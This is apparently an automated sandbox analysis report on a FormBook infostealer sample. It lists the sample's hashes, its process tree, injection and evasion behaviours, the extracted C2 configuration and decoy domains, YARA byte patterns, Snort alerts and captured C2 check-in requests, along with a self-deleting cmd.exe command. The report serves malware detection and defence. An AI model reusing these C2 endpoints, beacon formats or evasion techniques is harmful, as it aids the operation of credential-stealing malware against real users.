Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report LWlcpDjYIQ.exe

Overview

General Information

Sample Name:LWlcpDjYIQ.exe
Analysis ID:383953
MD5:91523f8d438585534d9466432cc4665d
SHA1:e34b69f0ded056eca7dd43b8f5be2edf7198c211
SHA256:b5e3426a888ddb5751f9802093f1bd10ec696b2994bee03b99b7ba2b4f21a57d
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a Windows Living Off The Land Binaries (LOL bins)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • LWlcpDjYIQ.exe (PID: 5524 cmdline: 'C:\Users\user\Desktop\LWlcpDjYIQ.exe' MD5: 91523F8D438585534D9466432CC4665D)
    • LWlcpDjYIQ.exe (PID: 3664 cmdline: 'C:\Users\user\Desktop\LWlcpDjYIQ.exe' MD5: 91523F8D438585534D9466432CC4665D)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmstp.exe (PID: 5796 cmdline: C:\Windows\SysWOW64\cmstp.exe MD5: 4833E65ED211C7F118D4A11E6FB58A09)
          • cmd.exe (PID: 6136 cmdline: /c del 'C:\Users\user\Desktop\LWlcpDjYIQ.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.simplyhealrhcareplans.com/sqra/"], "decoy": ["edwardjonescredticard.com", "muzhskoy-eskort.site", "home-sou.com", "entohops.com", "orchidandiris.com", "kellnetworks.com", "shopthen2.site", "jimmysga.com", "carobbella.com", "fenuadiscovery.com", "huongdandidong.com", "greenesgoodies.com", "socialunified.com", "azure-vs-google.cloud", "bardototonho.com", "anadelalastra.art", "godseyepiece.com", "18082020.com", "3559044.com", "hvacservicecoldwater.com", "inlandempiresublease.com", "cenconsulting.com", "clavunica.com", "zx765.com", "ndrossignol.com", "lumpkinforless.com", "merrypopinnannies.com", "herbalbooze.com", "opusleaf.com", "karizcustomizeme.com", "miss-windy.com", "esl-materials.com", "flcpyl.com", "metort.com", "ggapp.run", "josiahtreatenglishportfolio.com", "charmdalat.com", "kaashir.com", "magenx2.info", "mysfmp.com", "dailyhyundaihanoi.net", "camperlifeclub.com", "familymedicalurgentcare.com", "unityprawn.com", "crosswhiteconsulting.com", "luxel01.com", "runwithbe.com", "marfrigs.com", "lewishackney.com", "legalhelp.black", "thedorkweb.com", "carritogastronomico.com", "sniffai.com", "myboardinghome.com", "szameitat.net", "wegawk.com", "ecomcourse.online", "heritagelcc.com", "launchtutor.com", "bricksli.com", "911salesrescue.com", "shangbinjieneng.com", "seymor-law.com", "decoviewer.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.256436700.00000000006E0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000002.00000002.256436700.00000000006E0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000002.256436700.00000000006E0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    00000002.00000001.215824395.0000000000400000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000002.00000001.215824395.0000000000400000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 16 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.LWlcpDjYIQ.exe.1eb20000.5.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        0.2.LWlcpDjYIQ.exe.1eb20000.5.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        0.2.LWlcpDjYIQ.exe.1eb20000.5.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158a9:$sqlite3step: 68 34 1C 7B E1
        • 0x159bc:$sqlite3step: 68 34 1C 7B E1
        • 0x158d8:$sqlite3text: 68 38 2A 90 C5
        • 0x159fd:$sqlite3text: 68 38 2A 90 C5
        • 0x158eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
        2.2.LWlcpDjYIQ.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.LWlcpDjYIQ.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://www.lewishackney.com/sqra/?NBZl=RvvWc34iJhU4aDVvCPxlJYXQghZKjT+0jz617RLPtVuesnMs5OzQh/fCAeZj/K6zv/Ow&lzul=wRDL7BohbLBLJVAvira URL Cloud: Label: malware
          Source: http://www.ecomcourse.online/sqra/?NBZl=A685XXlO5s8wdT2GSl4VwObxhyaN1usH/ZDf3g436hkZTbYdTSv6UxS6ZdhF3LcC3Fcd&lzul=wRDL7BohbLBLJVAvira URL Cloud: Label: malware
          Source: http://www.muzhskoy-eskort.site/sqra/?NBZl=XY+ZErIRkQWtvrbZzW/Q2VqSgxI2oDXvZ0FX1dCtO5jFwgiNlKUf7p0wm51D3p8eN5aQ&lzul=wRDL7BohbLBLJVAvira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 00000002.00000002.256436700.00000000006E0000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.simplyhealrhcareplans.com/sqra/"], "decoy": ["edwardjonescredticard.com", "muzhskoy-eskort.site", "home-sou.com", "entohops.com", "orchidandiris.com", "kellnetworks.com", "shopthen2.site", "jimmysga.com", "carobbella.com", "fenuadiscovery.com", "huongdandidong.com", "greenesgoodies.com", "socialunified.com", "azure-vs-google.cloud", "bardototonho.com", "anadelalastra.art", "godseyepiece.com", "18082020.com", "3559044.com", "hvacservicecoldwater.com", "inlandempiresublease.com", "cenconsulting.com", "clavunica.com", "zx765.com", "ndrossignol.com", "lumpkinforless.com", "merrypopinnannies.com", "herbalbooze.com", "opusleaf.com", "karizcustomizeme.com", "miss-windy.com", "esl-materials.com", "flcpyl.com", "metort.com", "ggapp.run", "josiahtreatenglishportfolio.com", "charmdalat.com", "kaashir.com", "magenx2.info", "mysfmp.com", "dailyhyundaihanoi.net", "camperlifeclub.com", "familymedicalurgentcare.com", "unityprawn.com", "crosswhiteconsulting.com", "luxel01.com", "runwithbe.com", "marfrigs.com", "lewishackney.com", "legalhelp.black", "thedorkweb.com", "carritogastronomico.com", "sniffai.com", "myboardinghome.com", "szameitat.net", "wegawk.com", "ecomcourse.online", "heritagelcc.com", "launchtutor.com", "bricksli.com", "911salesrescue.com", "shangbinjieneng.com", "seymor-law.com", "decoviewer.com"]}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\nsmDEE3.tmp\9a5t.dllReversingLabs: Detection: 24%
          Multi AV Scanner detection for submitted fileShow sources
          Source: LWlcpDjYIQ.exeReversingLabs: Detection: 65%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.256436700.00000000006E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.215824395.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.474138939.00000000002D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.256399693.00000000006B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.220675052.000000001EB20000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.256111645.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.475870538.0000000002840000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.LWlcpDjYIQ.exe.1eb20000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.LWlcpDjYIQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.LWlcpDjYIQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.LWlcpDjYIQ.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.LWlcpDjYIQ.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.LWlcpDjYIQ.exe.1eb20000.5.raw.unpack, type: UNPACKEDPE
          Source: 7.2.cmstp.exe.45c708.2.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.2.LWlcpDjYIQ.exe.1eb20000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.2.cmstp.exe.4b87960.5.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 2.1.LWlcpDjYIQ.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.2.LWlcpDjYIQ.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: LWlcpDjYIQ.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: cmstp.pdbGCTL source: LWlcpDjYIQ.exe, 00000002.00000002.256547466.0000000000960000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: LWlcpDjYIQ.exe, 00000000.00000003.210847086.000000001ECE0000.00000004.00000001.sdmp, LWlcpDjYIQ.exe, 00000002.00000002.256684216.0000000000B1F000.00000040.00000001.sdmp, cmstp.exe, 00000007.00000002.476522146.0000000004650000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: LWlcpDjYIQ.exe, cmstp.exe
          Source: Binary string: cmstp.pdb source: LWlcpDjYIQ.exe, 00000002.00000002.256547466.0000000000960000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 0_2_0040531D DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 0_2_00405CB0 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 0_2_004026BC FindFirstFileA,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 4x nop then pop esi
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4x nop then pop esi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49722 -> 118.27.122.19:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49722 -> 118.27.122.19:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49722 -> 118.27.122.19:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49727 -> 184.168.131.241:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49727 -> 184.168.131.241:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49727 -> 184.168.131.241:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49731 -> 108.186.210.142:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49731 -> 108.186.210.142:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49731 -> 108.186.210.142:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49743 -> 5.101.152.161:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49743 -> 5.101.152.161:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49743 -> 5.101.152.161:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49744 -> 208.91.197.27:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49744 -> 208.91.197.27:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49744 -> 208.91.197.27:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.simplyhealrhcareplans.com/sqra/
          Source: global trafficHTTP traffic detected: GET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=+apFroP1TjGnxXEe5oaGEFG1FIGlVaZA9Y5GRttzGQ4z+BPhxNKjikjP31UiUH/cC1Iy HTTP/1.1Host: www.karizcustomizeme.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqra/?NBZl=l8gFWKa0VIasP4OX6UWILwSCtzkOc3V6oKupITn9HnPx0eDpBTl3az448bd8FGwLkJvi&lzul=wRDL7BohbLBLJV HTTP/1.1Host: www.luxel01.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=zH8yL9FtafuknHUuv+0OAb189SbLD7IfmvNkOBi8bJNQNfTK09EYjoUTP6M+ilwbYPXy HTTP/1.1Host: www.orchidandiris.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqra/?NBZl=lD4TJk9xsMd0/PL293fidflTFReEfYiBAFO2d5wZtfSldQt+n1O6CAKQlGZxKl5sANQQ&lzul=wRDL7BohbLBLJV HTTP/1.1Host: www.anadelalastra.artConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqra/?NBZl=A685XXlO5s8wdT2GSl4VwObxhyaN1usH/ZDf3g436hkZTbYdTSv6UxS6ZdhF3LcC3Fcd&lzul=wRDL7BohbLBLJV HTTP/1.1Host: www.ecomcourse.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=94GGx2Cs8EYqYWyk7qEtIIzRN3fkRhfUxg2Vtzz5w0QY/7xu41tS8mQoIQP3aceFOvfi HTTP/1.1Host: www.huongdandidong.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqra/?NBZl=XY+ZErIRkQWtvrbZzW/Q2VqSgxI2oDXvZ0FX1dCtO5jFwgiNlKUf7p0wm51D3p8eN5aQ&lzul=wRDL7BohbLBLJV HTTP/1.1Host: www.muzhskoy-eskort.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=n3U7aY9a5ujS+qWiRfdW0plv/0Nv8djS+qMboD1ih5qiP+MT365v99ebZUVRUFJkYzoK HTTP/1.1Host: www.simplyhealrhcareplans.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=nD+8EQ/dkrvxrfeXfZTM4uqVidyysXGGAQQPcyuh+D+qYnXcwF5fcGHppY2Ae0Rizhob HTTP/1.1Host: www.socialunified.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqra/?NBZl=RvvWc34iJhU4aDVvCPxlJYXQghZKjT+0jz617RLPtVuesnMs5OzQh/fCAeZj/K6zv/Ow&lzul=wRDL7BohbLBLJV HTTP/1.1Host: www.lewishackney.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=0hvqTGsG2LXykKa15oAG/2YmS9ez8HJt/56JneCT4XqEJpzhFqXtEbyiFIIf71vevGG9 HTTP/1.1Host: www.shopthen2.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=+apFroP1TjGnxXEe5oaGEFG1FIGlVaZA9Y5GRttzGQ4z+BPhxNKjikjP31UiUH/cC1Iy HTTP/1.1Host: www.karizcustomizeme.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 199.59.242.153 199.59.242.153
          Source: Joe Sandbox ViewIP Address: 198.185.159.144 198.185.159.144
          Source: Joe Sandbox ViewASN Name: BODIS-NJUS BODIS-NJUS
          Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
          Source: C:\Windows\explorer.exeCode function: 5_2_06416302 getaddrinfo,setsockopt,recv,
          Source: global trafficHTTP traffic detected: GET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=+apFroP1TjGnxXEe5oaGEFG1FIGlVaZA9Y5GRttzGQ4z+BPhxNKjikjP31UiUH/cC1Iy HTTP/1.1Host: www.karizcustomizeme.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqra/?NBZl=l8gFWKa0VIasP4OX6UWILwSCtzkOc3V6oKupITn9HnPx0eDpBTl3az448bd8FGwLkJvi&lzul=wRDL7BohbLBLJV HTTP/1.1Host: www.luxel01.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=zH8yL9FtafuknHUuv+0OAb189SbLD7IfmvNkOBi8bJNQNfTK09EYjoUTP6M+ilwbYPXy HTTP/1.1Host: www.orchidandiris.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqra/?NBZl=lD4TJk9xsMd0/PL293fidflTFReEfYiBAFO2d5wZtfSldQt+n1O6CAKQlGZxKl5sANQQ&lzul=wRDL7BohbLBLJV HTTP/1.1Host: www.anadelalastra.artConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqra/?NBZl=A685XXlO5s8wdT2GSl4VwObxhyaN1usH/ZDf3g436hkZTbYdTSv6UxS6ZdhF3LcC3Fcd&lzul=wRDL7BohbLBLJV HTTP/1.1Host: www.ecomcourse.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=94GGx2Cs8EYqYWyk7qEtIIzRN3fkRhfUxg2Vtzz5w0QY/7xu41tS8mQoIQP3aceFOvfi HTTP/1.1Host: www.huongdandidong.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqra/?NBZl=XY+ZErIRkQWtvrbZzW/Q2VqSgxI2oDXvZ0FX1dCtO5jFwgiNlKUf7p0wm51D3p8eN5aQ&lzul=wRDL7BohbLBLJV HTTP/1.1Host: www.muzhskoy-eskort.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=n3U7aY9a5ujS+qWiRfdW0plv/0Nv8djS+qMboD1ih5qiP+MT365v99ebZUVRUFJkYzoK HTTP/1.1Host: www.simplyhealrhcareplans.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=nD+8EQ/dkrvxrfeXfZTM4uqVidyysXGGAQQPcyuh+D+qYnXcwF5fcGHppY2Ae0Rizhob HTTP/1.1Host: www.socialunified.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqra/?NBZl=RvvWc34iJhU4aDVvCPxlJYXQghZKjT+0jz617RLPtVuesnMs5OzQh/fCAeZj/K6zv/Ow&lzul=wRDL7BohbLBLJV HTTP/1.1Host: www.lewishackney.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=0hvqTGsG2LXykKa15oAG/2YmS9ez8HJt/56JneCT4XqEJpzhFqXtEbyiFIIf71vevGG9 HTTP/1.1Host: www.shopthen2.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=+apFroP1TjGnxXEe5oaGEFG1FIGlVaZA9Y5GRttzGQ4z+BPhxNKjikjP31UiUH/cC1Iy HTTP/1.1Host: www.karizcustomizeme.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.karizcustomizeme.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.13.4Date: Thu, 08 Apr 2021 11:02:14 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 285Connection: closeVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 71 72 61 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 73 68 6f 70 74 68 65 6e 32 2e 73 69 74 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /sqra/ was not found on this server.</p><hr><address>Apache/2.4.10 (Unix) Server at www.shopthen2.site Port 80</address></body></html>
          Source: explorer.exe, 00000005.00000000.240958021.000000000F709000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
